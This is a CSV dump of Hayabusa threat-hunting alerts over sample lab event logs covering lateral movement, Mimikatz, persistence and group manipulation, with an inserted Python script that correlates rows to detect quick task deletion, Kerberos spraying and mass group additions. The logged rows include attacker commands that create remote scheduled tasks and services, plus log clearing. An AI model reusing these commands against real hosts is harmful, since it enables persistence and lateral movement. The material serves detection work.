2020-07-10 05:58:12.004 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64ca,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64e1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64f3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 06:22:31.163 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx"
2020-07-10 06:25:41.773 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx"
2020-07-10 07:00:11.181 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52543 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:17.584 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 2568 | PGUID: 747F3D96-9371-5F07-0000-00102D024400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:27.033 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52545 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7356 | PGUID: 747F3D96-937F-5F07-0000-0010EBDD4400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:40.413 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52546 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:45.589 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7976 | PGUID: 747F3D96-938D-5F07-0000-001043A84500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
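Added example, not Hayabusa's code and not part of this output: a Python pass over Hayabusa's CSV layout that correlates across rows, which the per-event rules in this dump do not do (each rule fires once per row, and a single event can appear several times when more than one rule matches it, as the 4699 and 4728 rows here show). It parses the Timestamp column with its +09:00 offset and the "key: value | key: value" Details column, then checks three patterns the sample files in this dump are named for: a scheduled task created and deleted within seconds (4698 then 4699), a burst of failed Kerberos TGT requests for many principals from one IP (4768 with Status 0x6), and one SID added to many groups at once (4728). The sample rows are constructed for the example and patterned on records in this dump; r.yml, s.evtx, dc01, EXAMPLE.LAN and the function names are placeholders of mine, not Hayabusa's.

```python
"""Second-pass correlation over Hayabusa CSV output. Each rule fires once per row, so
patterns that span rows (a task created and deleted within a second, one IP failing
Kerberos for many principals, one SID added to many groups) need a pass like this one."""
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in Hayabusa's CSV layout, patterned on the records on this page.
# RulePath/FilePath are placeholders (r.yml, s.evtx), not Hayabusa's real paths.
_HEADER = "Timestamp,Computer,EventID,Level,MitreAttack,RuleTitle,Details,RulePath,FilePath"
_ROWS = [
    # a task created and deleted 94 ms later, the trace an SMBexec-style tool leaves
    '2020-07-12 06:38:17.351 +09:00,fs02.offsec.lan,4698,info,,Task Created,'
    '"Name: \\smbservice | Content: <Task version=""1.2""/> | User: admmig | LID: 0x3246775",r.yml,s.evtx',
    '2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,info,,Task Deleted,'
    'Name: \\smbservice | User: admmig | LID: 0x3246ace,r.yml,s.evtx',
    # a task that lived ten minutes: must not alert
    '2020-07-12 06:00:00.000 +09:00,fs02.offsec.lan,4698,info,,Task Created,'
    'Name: \\backup | User: admmig | LID: 0x10,r.yml,s.evtx',
    '2020-07-12 06:10:00.000 +09:00,fs02.offsec.lan,4699,info,,Task Deleted,'
    'Name: \\backup | User: admmig | LID: 0x10,r.yml,s.evtx',
    # a successful TGT (Status 0x0) from the spraying IP: must not count
    '2020-07-23 05:29:36.434 +09:00,dc01,4768,info,,Kerberos TGT Requested,'
    'User: normal | Svc: krbtgt | IP Addr: 172.16.66.1 | Status: 0x0 | PreAuthType: 2,r.yml,s.evtx',
]
# seven TGT requests for distinct principals from one IP within a millisecond, all Status
# 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN): the names do not exist, so this is name guessing
_ROWS += [
    '2020-07-23 05:29:36.414 +09:00,dc01,4768,info,,Kerberos TGT Requested,'
    f'User: {u} | Svc: krbtgt/EXAMPLE.LAN | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,r.yml,s.evtx'
    for u in ("HD01", "admin", "svc-02", "HD02", "svc-01", "bob", "admin02")
]
# one SID added to six groups 2 ms apart; Hayabusa writes each event twice because two
# rules (medium and low) match it, so the detector counts distinct groups, not rows
_ROWS += [
    f'2020-07-12 14:19:54.{560 + 2 * i:03d} +09:00,rootdc1.offsec.lan,4728,{level},Persis,{title},'
    f'SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group{i + 1:02d} | LID: 0x8084443,r.yml,s.evtx'
    for i in range(6)
    for level, title in (("medium", "User Added To Global Security Group"),
                         ("low", "User Added To Non-Admin Global Group"))
]
SAMPLE_CSV = "\n".join([_HEADER, *_ROWS]) + "\n"


def parse_hayabusa_csv(text):
    """One dict per row: Timestamp as an aware datetime, Details split into Fields."""
    for row in csv.DictReader(io.StringIO(text)):  # csv undoes the "" quote doubling
        row["Timestamp"] = datetime.strptime(row["Timestamp"], "%Y-%m-%d %H:%M:%S.%f %z")
        row["Fields"] = dict(part.partition(": ")[::2]  # ("key", "value") pairs
                             for part in row["Details"].split(" | ") if part)
        yield row


def _bursts(events, event_id, key_fields, value_field, window, min_distinct, keep=lambda f: True):
    """Group `event_id` rows by key_fields (row columns or Details keys); report each
    group in which some `window` holds at least min_distinct distinct value_field values."""
    groups = defaultdict(list)
    for ev in events:
        f = ev["Fields"]
        if ev["EventID"] == event_id and keep(f):
            key = tuple(ev[k] if k in ev else f.get(k, "") for k in key_fields)
            groups[key].append((ev["Timestamp"], f.get(value_field, "")))
    hits = []
    for key, stamped in groups.items():
        stamped.sort()
        for i, (t0, _) in enumerate(stamped):
            seen = {v for t, v in stamped[i:] if t - t0 <= window}
            if len(seen) >= min_distinct:
                hits.append((*key, sorted(seen)))
                break
    return hits


def task_create_delete(events, max_gap=timedelta(seconds=5)):
    """4698 then 4699 for the same task name on the same host within max_gap."""
    created, hits = {}, []
    for ev in sorted(events, key=lambda e: e["Timestamp"]):
        key = (ev["Computer"], ev["Fields"].get("Name", ""))
        if ev["EventID"] == "4698":
            created[key] = ev["Timestamp"]
        elif ev["EventID"] == "4699" and key in created:
            gap = ev["Timestamp"] - created.pop(key)
            if gap <= max_gap:
                hits.append((*key, ev["Fields"].get("User", ""), gap.total_seconds()))
    return hits


def kerberos_spray(events, window=timedelta(minutes=5), min_users=5):
    """Failed 4768s (Status != 0x0) from one IP for min_users distinct principals inside
    `window`; 0x6 is an unknown principal, 0x18 a wrong password for a real one."""
    return _bursts(events, "4768", ("Computer", "IP Addr"), "User", window, min_users,
                   keep=lambda f: f.get("Status", "0x0") != "0x0")


def mass_group_adds(events, window=timedelta(minutes=1), min_groups=5):
    """One SID added (4728) to min_groups distinct global groups inside `window`."""
    return _bursts(events, "4728", ("SID",), "Group", window, min_groups)


def run(text=SAMPLE_CSV):
    """Run all three detectors over one Hayabusa CSV document; returns hits per detector."""
    events = list(parse_hayabusa_csv(text))
    return {"task_create_delete": task_create_delete(events),
            "kerberos_spray": kerberos_spray(events),
            "mass_group_adds": mass_group_adds(events)}
```

Call run() for the embedded sample, or run(open("results.csv").read()) on a real Hayabusa CSV. The detectors count distinct task names, principals and groups rather than rows precisely because Hayabusa emits one row per matching rule; the thresholds and windows are starting points to tune against your own baseline, and the Status filter in kerberos_spray deliberately catches both 0x6 (principal does not exist) and 0x18 (wrong password), since a spray against real accounts produces the latter.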
2020-07-10 07:00:48.105 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\windows\system32\notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x68b4a | PID: 8032 | PGUID: 747F3D96-9390-5F07-0000-00105CBC4500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:58.550 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52547 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:01:03.898 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7456 | PGUID: 747F3D96-939F-5F07-0000-0010888E4600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:01:06.427 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" | LID: 0x68b4a | PID: 7200 | PGUID: 747F3D96-93A2-5F07-0000-00108EC54600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:05:58.373 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 3096 | PGUID: 747F3D96-94C3-5F07-0000-001080B40100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:06:07.487 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x3bfab | PID: 3248 | PGUID: 747F3D96-94CF-5F07-0000-0010BD590400,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 19:20:34.910 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: rdpclip | Process: C:\Windows\System32\rdpclip.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\svchost.exe -k NetworkService -s TermService | LID: 0x3bfab | PID: 3304 | PGUID: 747F3D96-40F2-5F08-0000-0010D8A92C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-10 19:20:35.589 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:53627 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 824 | PGUID: 747F3D96-1350-5F08-0000-001014C50000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""\\tsclient\c\temp\stack\a.exe"" | Process: \\tsclient\c\temp\stack\a.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3bfab | PID: 4236 | PGUID: 747F3D96-40F5-5F08-0000-001095812D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-11 22:21:11.693 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
2020-07-11 22:21:17.514 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
2020-07-11 22:21:18.640 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
2020-07-12 02:16:42.576 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
2020-07-12 02:16:42.592 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
2020-07-12 02:16:50.984 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
2020-07-12 02:18:01.228 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
2020-07-12 06:09:03.249 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: schtasks /create /s fs02 /tn tasks_test_hacker2 /tr myapp.exe /sc daily /mo 10 | Path: C:\Windows\System32\schtasks.exe | PID: 0x1e18 | User: lambda-user | LID: 0x1d41a5fa,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-Scheduled task creation.evtx
2020-07-12 06:38:17.351 +09:00,fs02.offsec.lan,4698,info,,Task Created,"Name: \smbservice | Content: 2020-07-11T21:38:17 OFFSEC\lambda-user 2020-07-11T15:20:00 true IgnoreNew true true true false false PT10M PT1H true false true true false false false PT72H 7 C:\WINDOWS\Temp\MpCmdRun.bat S-1-5-18 LeastPrivilege | User: admmig | LID: 0x3246775",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx
2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,info,,Task Deleted,Name: \smbservice | User: admmig | LID: 0x3246ace,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx
2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx
2020-07-12 06:46:39.786 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc \\fs02\ create hacker-testl binPath=""virus.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x53c | User: admmig | LID: 0x58dbaa",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Command SC to create service on remote host.evtx
2020-07-12 06:49:56.318 +09:00,fs02.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx
2020-07-12 06:50:07.213 +09:00,fs02.offsec.lan,7045,info,Persis,Service Installed,Name: bad-task | Path: virusé.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx
2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,low,Persis,Local User Account Created,User: admin-kriss | SID: S-1-5-21-4230534742-2542757381-3142984815-1166,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-4726 Fast created-deleted user.evtx
2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,low,Persis,Local User Account Created,User: admin-kriss | SID: S-1-5-21-4230534742-2542757381-3142984815-1166,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Admin like user created.evtx
2020-07-12 14:12:58.295 +09:00,jump01.offsec.lan,4720,low,Persis,Local User Account Created,User: hacking-local-acct | SID: S-1-5-21-1470532092-3758209836-3742276719-1001,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Local user created.evtx
2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-1470532092-3758209836-3742276719-1001 | Group: Administrators | LID: 0x58d874,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-User added to local admin groups.evtx
2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-1470532092-3758209836-3742276719-1001 | Group: Administrators | LID: 0x58d874,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-4733-Quick added-removed user from local group.evtx
2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1158 | Group: Group02 | LID: 0x807afcb,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx
2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1158 | Group: Group02 | LID: 0x807afcb,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx
2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group01 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group01 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group02 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group02 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group03 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
